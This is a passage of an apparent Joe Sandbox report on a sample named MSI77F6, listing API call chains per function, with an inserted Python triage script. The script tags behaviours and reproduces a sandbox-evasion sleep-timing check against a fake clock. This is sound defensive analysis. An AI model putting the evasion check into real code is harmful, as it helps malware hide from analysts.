                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf45f7c0caeee6c4cbe0b352474e7d87ea26cebc7e2440b4a8c0f3dfb29b732a
                                        • Instruction ID: fb7d298efa2dde7ae10c6a0f1c36a445f6e32a7d62f9a9666aebb456e9daf5bd
                                        • Opcode Fuzzy Hash: cf45f7c0caeee6c4cbe0b352474e7d87ea26cebc7e2440b4a8c0f3dfb29b732a
                                        • Instruction Fuzzy Hash: CE410275900106AFDB22DB68CC49FA9BB7AEB09320F144267E919E73D0C738ED01D664
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007C17D4
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007C17FD
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007C183C
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007C1861
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007C1869
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                        • String ID:
                                        • API String ID: 1389676194-0
                                        • Opcode ID: c6e41b28a36750d159c85158cd349fea2e206ab88103c4e2089c4f2f78f1ef5a
                                        • Instruction ID: d2e49b6903260545f5527a4e14e7a4ab2c704d5513c8be301bb9d8aa36d20ca7
                                        • Opcode Fuzzy Hash: c6e41b28a36750d159c85158cd349fea2e206ab88103c4e2089c4f2f78f1ef5a
                                        • Instruction Fuzzy Hash: DD410835A00205EFCF11EF64C985AADBBF5EF08350B14C099E809AB362DB39ED11DB91
                                        APIs
                                        • GetCursorPos.USER32(000000FF), ref: 0078B749
                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0078B766
                                        • GetAsyncKeyState.USER32(00000001), ref: 0078B78B
                                        • GetAsyncKeyState.USER32(00000002), ref: 0078B799
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: d32d4939e5c9b6051b9627065fb5bce5e14ad2b6f76b89d8854bc5844b6e300a
                                        • Instruction ID: 0a7fd1a35e81ce0e81ab715c5620275e59437abfee409a041877b767edd6c75a
                                        • Opcode Fuzzy Hash: d32d4939e5c9b6051b9627065fb5bce5e14ad2b6f76b89d8854bc5844b6e300a
                                        • Instruction Fuzzy Hash: 05418231504259FFEF259F65C848AE9BBB4FB49360F10435AF829922E0C738AD50DFA1
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 007AC156
                                        • PostMessageW.USER32(?,00000201,00000001), ref: 007AC200
                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007AC208
                                        • PostMessageW.USER32(?,00000202,00000000), ref: 007AC216
                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007AC21E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 9bc3f84295a2643a8b44e398d87f912b772797fc34e9e7ea71048d7d5d4a548b
                                        • Instruction ID: 6163e2dcad61ed9b693bc1fbdc7f9e91d1beea528fa0168d75e04e5295c40a96
                                        • Opcode Fuzzy Hash: 9bc3f84295a2643a8b44e398d87f912b772797fc34e9e7ea71048d7d5d4a548b
                                        • Instruction Fuzzy Hash: 8831BFB160021DEBDB15CFA8DD4DAAE3BB6EB45315F104215F920EA1D1C7B89D14CB90
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 007AE9CD
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AE9EA
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AEA22
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007AEA48
                                        • _wcsstr.LIBCMT ref: 007AEA52
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                        • String ID:
                                        • API String ID: 3902887630-0
                                        • Opcode ID: 83fdb36aaf91cd810f3fe72d3c95becf250554b4fc61fae8bd2dce7f59b0bd19
                                        • Instruction ID: 33fb2ccaeb89cb743c2bd8f2607410f2b83dfaf5b77f28f88d805072c84ed8d4
                                        • Opcode Fuzzy Hash: 83fdb36aaf91cd810f3fe72d3c95becf250554b4fc61fae8bd2dce7f59b0bd19
                                        • Instruction Fuzzy Hash: 6321F972204204BEEB259B69EC49E7F7BADEF86750F10C139F809CA191DA79DC409690
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007DDCC0
                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007DDCE4
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007DDCFC
                                        • GetSystemMetrics.USER32(00000004), ref: 007DDD24
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,007C407D,00000000), ref: 007DDD42
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Long$MetricsSystem
                                        • String ID:
                                        • API String ID: 2294984445-0
                                        • Opcode ID: 5f409b1ec3268657a25d8fabcaa0c96f048322d4fc7c096efc0e48232798b7d2
                                        • Instruction ID: a19ba3ba2afb50222dd39a25a5ae3dc5c732f0ddad3c853b1b9ce3a94f144cc8
                                        • Opcode Fuzzy Hash: 5f409b1ec3268657a25d8fabcaa0c96f048322d4fc7c096efc0e48232798b7d2
                                        • Instruction Fuzzy Hash: B821AC71614212AFCF305F798C48B6A37A6FB45765F104B36F926D62E0E7789C10CB90
                                        APIs
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007ACA86
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007ACAB8
                                        • __itow.LIBCMT ref: 007ACAD0
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007ACAF6
                                        • __itow.LIBCMT ref: 007ACB07
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$__itow$_memmove
                                        • String ID:
                                        • API String ID: 2983881199-0
                                        • Opcode ID: 0fc772724dce12299e41b537a2e48e2f3aebf369f90305db365dc675a026fcad
                                        • Instruction ID: ce989d2a8a5db4467230ca985c7dc743625fb26e1029834f8caf63746d3a725a
                                        • Opcode Fuzzy Hash: 0fc772724dce12299e41b537a2e48e2f3aebf369f90305db365dc675a026fcad
                                        • Instruction Fuzzy Hash: 7C210176700214FBDF25EAA49C4BEDE7B69DF8A750F008124F905E7281D6798D05C7A0
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 007C89CE
                                        • GetForegroundWindow.USER32 ref: 007C89E5
                                        • GetDC.USER32(00000000), ref: 007C8A21
                                        • GetPixel.GDI32(00000000,?,00000003), ref: 007C8A2D
                                        • ReleaseDC.USER32(00000000,00000003), ref: 007C8A68
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        • String ID:
                                        • API String ID: 4156661090-0
                                        • Opcode ID: 62f7b6cbe8507863965523f1fd4a7706a461ac7c90b28d21aa0592fa5c5ea942
                                        • Instruction ID: 9ad1c991b4565d8f28d69a470008d629475ea2a13a383dbbf5eeb5115c30d15f
                                        • Opcode Fuzzy Hash: 62f7b6cbe8507863965523f1fd4a7706a461ac7c90b28d21aa0592fa5c5ea942
                                        • Instruction Fuzzy Hash: 8E216F75A00204AFDB10EF65C889BAA7BF5EF48341F04C47DE94AD7351DA78AD00CB61
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0078B5EB
                                        • SelectObject.GDI32(?,00000000), ref: 0078B5FA
                                        • BeginPath.GDI32(?), ref: 0078B611
                                        • SelectObject.GDI32(?,00000000), ref: 0078B63B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: 500e9d0196c60f4f919f8df819c23d8fcf414602a334d3324c4743437dd80f06
                                        • Instruction ID: 54de4f68c53d5b43fce72a9b4ea3f6c3ee8e3a9afdc6f1858d63f24ed367c86f
                                        • Opcode Fuzzy Hash: 500e9d0196c60f4f919f8df819c23d8fcf414602a334d3324c4743437dd80f06
                                        • Instruction Fuzzy Hash: 5521AE70900348EFDF20AF15EC4C7AABBE9FB80B25F14452AF411921B0D3B898A1CB58
                                        APIs
                                        • __calloc_crt.LIBCMT ref: 00792E81
                                        • CreateThread.KERNEL32(?,?,00792FB7,00000000,?,?), ref: 00792EC5
                                        • GetLastError.KERNEL32 ref: 00792ECF
                                        • _free.LIBCMT ref: 00792ED8
                                        • __dosmaperr.LIBCMT ref: 00792EE3
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                        • String ID:
                                        • API String ID: 2664167353-0
                                        • Opcode ID: 958a12ae5bb57571e12e501d647b5d70cffd78b7f21bbae45e266de15b223f90
                                        • Instruction ID: 81dd59932463967ec490789ddff58f7928fe3951b2b72fcc678a7fd8660f0722
                                        • Opcode Fuzzy Hash: 958a12ae5bb57571e12e501d647b5d70cffd78b7f21bbae45e266de15b223f90
                                        • Instruction Fuzzy Hash: 5B11A532104705FF9F20BFA5BC89D6B7BA9EF45760B100529F91886152DB39D80287A5
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007AB903
                                        • GetLastError.KERNEL32(?,007AB3CB,?,?,?), ref: 007AB90D
                                        • GetProcessHeap.KERNEL32(00000008,?,?,007AB3CB,?,?,?), ref: 007AB91C
                                        • RtlAllocateHeap.NTDLL(00000000,?,007AB3CB), ref: 007AB923
                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007AB93A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 883493501-0
                                        • Opcode ID: 2cb44568c64a8e5ecfa4bcea1551dd98504120eecf6de223c04fac529bbdfcc2
                                        • Instruction ID: 8d8cacc8e13f2bb80b7a3ba83a147a6defe7579c24d3f9217e7b7443c76ac1dc
                                        • Opcode Fuzzy Hash: 2cb44568c64a8e5ecfa4bcea1551dd98504120eecf6de223c04fac529bbdfcc2
                                        • Instruction Fuzzy Hash: 9C016971201208FFDB214FA5DC88D7B3BAEEF8A7A4B104029FA45C2261DB799C40DA60
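The function entries above are the raw material for capability triage: each "APIs" list is an ordered API chain, and several of those chains say more than their individual calls do (RegConnectRegistryW followed by RegEnumKeyExW, WM_GETTEXTLENGTH and WM_GETTEXT fed into CharUpperBuffW and _wcsstr, GetAsyncKeyState polling, QueryPerformanceCounter on both sides of a Sleep in the entry that follows). The Python script below is an added example, not part of the Joe Sandbox report and not code from the analysed sample. It parses entries in the report's own "APIs" format, tags them with behaviour labels whose names and rules are this example's own assumptions about what the chains mean (not the sandbox's classifier), and reproduces the timing computation behind the QueryPerformanceCounter/Sleep chain against a constructed fake clock so that it runs offline. The sample input is copied from this page's entries.

```python
import re

# Constructed sample input: "APIs" sub-lists copied from four function entries on
# this page, in the report's own form (bullet, Name.MODULE(args), ref: address).
SAMPLE_ENTRIES = """\
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D2DE0
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D2E1F
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007D2E66
APIs
• GetCursorPos.USER32(000000FF), ref: 0078B749
• ScreenToClient.USER32(00000000,000000FF), ref: 0078B766
• GetAsyncKeyState.USER32(00000001), ref: 0078B78B
• GetAsyncKeyState.USER32(00000002), ref: 0078B799
APIs
• IsWindowVisible.USER32(?), ref: 007AE9CD
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AE9EA
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AEA22
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007AEA48
• _wcsstr.LIBCMT ref: 007AEA52
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000), ref: 007B8371
• QueryPerformanceFrequency.KERNEL32(?,?), ref: 007B837F
• Sleep.KERNEL32(00000000,?), ref: 007B8387
• QueryPerformanceCounter.KERNEL32(?,?), ref: 007B8391
"""

# One call line; the "Part of subcall function" prefix and the missing argument
# list on LIBCMT entries are both accepted.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?.*?ref:\s*(?P<ref>[0-9A-F]+)")
WM_NAMES = {0x0D: "WM_GETTEXT", 0x0E: "WM_GETTEXTLENGTH"}  # SendMessageW 2nd argument

def parse_entries(text):
    """Split at each 'APIs' header; one list of (name, args, ref) per function."""
    entries = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append([])
        elif entries and (m := CALL_RE.match(line)):
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            entries[-1].append((m.group("name"), args, m.group("ref")))
    return entries

def messages_sent(calls):
    """Window-message names passed as the second argument of Send/PostMessageW."""
    found = set()
    for name, args, _ in calls:
        if name in ("SendMessageW", "PostMessageW") and len(args) > 1:
            try:
                msg = int(args[1], 16)
            except ValueError:      # '?' means the disassembler could not resolve it
                continue
            found.add(WM_NAMES.get(msg, hex(msg)))
    return found

def tag_entry(calls):
    """Behaviour tags inferred from the chain; labels and rules are this example's own."""
    names = [n for n, _, _ in calls]
    present, msgs, tags = set(names), messages_sent(calls), []
    if {"RegConnectRegistryW", "RegEnumKeyExW"} <= present:
        tags.append("remote-registry-enumeration")
    if "GetAsyncKeyState" in present:
        tags.append("input-state-polling")
    if {"WM_GETTEXTLENGTH", "WM_GETTEXT"} <= msgs and "_wcsstr" in present:
        tags.append("window-title-substring-scan")  # title read, upper-cased, substring test
    qpc = [i for i, n in enumerate(names) if n == "QueryPerformanceCounter"]
    if len(qpc) >= 2 and any(qpc[0] < i < qpc[-1] for i, n in enumerate(names) if n == "Sleep"):
        tags.append("sleep-timing-check")           # counter read before and after a Sleep
    return tags

def triage(text):
    """(address of first call, tags) for every entry in the report text."""
    return [(calls[0][2], tag_entry(calls)) for calls in parse_entries(text) if calls]

def sleep_was_skipped(requested_ms, clock, sleep, tolerance=0.5):
    """The computation behind the counter/Sleep/counter chain: a Sleep that returns in
    well under the requested time betrays an environment that fast-forwards sleeps."""
    start = clock()
    sleep(requested_ms / 1000.0)
    return (clock() - start) * 1000.0 < requested_ms * tolerance

class FakeHost:
    """Constructed clock: honor=True advances by the slept time (a real host);
    honor=False advances 1 ms regardless (a Sleep patched to return at once)."""
    def __init__(self, honor):
        self.now, self.honor = 0.0, honor
    def clock(self):
        return self.now
    def sleep(self, secs):
        self.now += secs if self.honor else 0.001
    def run_check(self, requested_ms):
        return sleep_was_skipped(requested_ms, self.clock, self.sleep)

if __name__ == "__main__":
    print(triage(SAMPLE_ENTRIES), FakeHost(honor=False).run_check(2000))
```

The tagging is deliberately order-aware where order matters: the timing rule requires the Sleep to sit between two QueryPerformanceCounter reads, which is what distinguishes a delay measurement from an unrelated counter read and a Sleep in the same function. The 50 percent tolerance in sleep_was_skipped is an arbitrary assumption; the point of that half of the script is only to show why the chain is flagged as sandbox detection, since an environment that shortens or skips Sleep without advancing the high-resolution counter fails the check on a real host but trips it under analysis.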
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007B8371
                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007B837F
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007B8387
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007B8391
                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007B83CD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        APIs
                                        • CLSIDFromProgID.COMBASE ref: 007AA874
                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 007AA88F
                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 007AA89D
                                        • CoTaskMemFree.COMBASE(00000000), ref: 007AA8AD
                                        • CLSIDFromString.COMBASE(?,?), ref: 007AA8B9
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007AB806
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007AB810
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007AB81F
                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 007AB826
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007AB83C
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007AB7A5
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007AB7AF
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007AB7BE
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 007AB7C5
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007AB7DB
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 007AFA8F
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 007AFAA6
                                        • MessageBeep.USER32(00000000), ref: 007AFABE
                                        • KillTimer.USER32(?,0000040A), ref: 007AFADA
                                        • EndDialog.USER32(?,00000001), ref: 007AFAF4
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        APIs
                                        • EndPath.GDI32(?), ref: 0078B526
                                        • StrokeAndFillPath.GDI32(?,?,007EF583,00000000,?), ref: 0078B542
                                        • SelectObject.GDI32(?,00000000), ref: 0078B555
                                        • DeleteObject.GDI32 ref: 0078B568
                                        • StrokePath.GDI32(?), ref: 0078B583
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 007BFAB2
                                        • CoCreateInstance.COMBASE(007FDA7C,00000000,00000001,007FD8EC,?), ref: 007BFACA
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • CoUninitialize.COMBASE ref: 007BFD2D
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                        • String ID: .lnk
                                        • API String ID: 2683427295-24824748
                                        Similarity
                                        • API ID:
                                        • String ID: #$+
                                        • API String ID: 0-2552117581
                                        APIs
